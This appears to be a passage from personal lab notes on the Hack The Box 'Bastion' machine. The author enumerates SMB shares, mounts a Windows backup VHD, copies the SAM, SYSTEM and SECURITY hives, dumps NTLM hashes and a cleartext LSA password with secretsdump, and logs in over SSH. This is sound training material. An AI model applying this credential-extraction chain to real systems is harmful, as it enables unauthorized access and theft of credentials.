2 :139 :445 smb

$ smbclient -L 10.10.10.134
Enter WORKGROUP\kashz's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Backups         Disk
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
SMB1 disabled -- no workgroup available

$ smbclient //10.10.10.134/Backups
Enter WORKGROUP\kashz's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat May  8 16:29:34 2021
  ..                                  D        0  Sat May  8 16:29:34 2021
  nmap-test-file                      A      260  Sat May  8 16:29:34 2021
  note.txt                           AR      116  Tue Apr 16 03:10:09 2019
  SDT65CB.tmp                         A        0  Fri Feb 22 04:43:08 2019
  WindowsImageBackup                 Dn        0  Fri Feb 22 04:44:02 2019

WindowsImageBackup files contain .vhd files that we should look into Mounting the share

Using https://medium.com/@klockw3rk/mounting-vhd-file-on-kali-linux-through-remote-share-f2f9542c1f25

$ sudo mount -t cifs //10.10.10.134/Backups /mnt/remote -o rw  
[sudo] password for kashz:
Password for root@//10.10.10.134/Backups:

$ cd /mnt/remote

$ ls
nmap-test-file  note.txt  SDT65CB.tmp  WindowsImageBackup

# making /mnt/vhd for one
# NEED TO RUN THIS AS SUDO USER INTERACTIVELY; else didn't work for me. was getting perms error while access the vhd files once mounted.
(as root)$ guestmount --add "/mnt/remote/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd" --inspector --ro /mnt/vhd -v

# cp SAM /home/kashz/Desktop/HTB/bastion
# cp SYSTEM /home/kashz/Desktop/HTB/bastion
# cp SECURITY /home/kashz/Desktop/HTB/bastion


$ secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
(or /usr/share/creddump7/pwdump.py SYSTEM SAM)
Impacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword
(Unknown User):bureaulampje
[*] DPAPI_SYSTEM
dpapi_machinekey:0x32764bdcb45f472159af59f1dc287fd1920016a6
dpapi_userkey:0xd2e02883757da99914e3138496705b223e9d03dd
[*] Cleaning up...


L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
Pass: bureaulampje

$ ssh l4mpje@10.10.10.134
The authenticity of host '10.10.10.134 (10.10.10.134)' can't be established.
ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.134' (ECDSA) to the list of known hosts.
l4mpje@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

l4mpje@BASTION C:\Users\L4mpje>whoami
bastion\l4mpje

Previous3 box enum > privesc Next1 recon

Last updated 4 years ago